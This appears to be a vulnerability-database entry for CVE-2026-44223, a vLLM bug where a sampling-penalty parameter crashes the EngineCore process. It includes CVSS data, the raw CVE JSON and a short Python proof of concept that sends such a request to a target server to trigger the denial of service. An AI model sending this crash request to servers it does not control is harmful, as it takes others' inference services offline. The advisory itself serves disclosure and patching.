Security Vulnerability Report
中文
CVE-2026-44223 CVSS 6.5 MEDIUM

CVE-2026-44223

Published: 2026-05-12 20:16:43
Last Modified: 2026-05-12 20:16:43

Description

vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

vLLM < 0.20.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # PoC for CVE-2026-44223 # Target: vLLM server versions < 0.20.0 # Description: This script sends a request with a repetition_penalty parameter # to trigger the tensor shape mismatch bug in the speculative decoding proposer. def check_vulnerability(target_url): headers = {"Content-Type": "application/json"} endpoint = f"{target_url}/v1/completions" # Payload containing the sampling penalty parameter that triggers the crash payload = { "model": "meta-llama/Llama-2-7b-chat-hf", # Example model name "prompt": "Explain this vulnerability.", "max_tokens": 50, # The presence of 'repetition_penalty' triggers the incorrect tensor shape "repetition_penalty": 1.1 } try: print(f"[*] Sending payload to {endpoint}...") response = requests.post(endpoint, headers=headers, data=json.dumps(payload), timeout=10) # If the server crashes, the connection might be reset or return a 500 error if response.status_code == 500 or response.status_code == 502: print("[+] Potential vulnerability triggered! Server returned error code: {}".format(response.status_code)) elif "RuntimeError" in response.text or "Internal Server Error" in response.text: print("[+] Vulnerability likely triggered. RuntimeError detected in response.") else: print("[-] Request completed. Server might be patched or not vulnerable.") print("Response status:", response.status_code) except requests.exceptions.ConnectionError: print("[+] Connection error. The EngineCore process may have crashed (DoS).") except Exception as e: print(f"[-] An unexpected error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://localhost:8000" check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44223", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:43.293", "lastModified": "2026-05-12T20:16:43.293", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., \"repetition_penalty\": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-131"}, {"lang": "en", "value": "CWE-704"}]}], "references": [{"url": "https://github.com/vllm-project/vllm/pull/38610", "source": "[email protected]"}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw", "source": "[email protected]"}]}}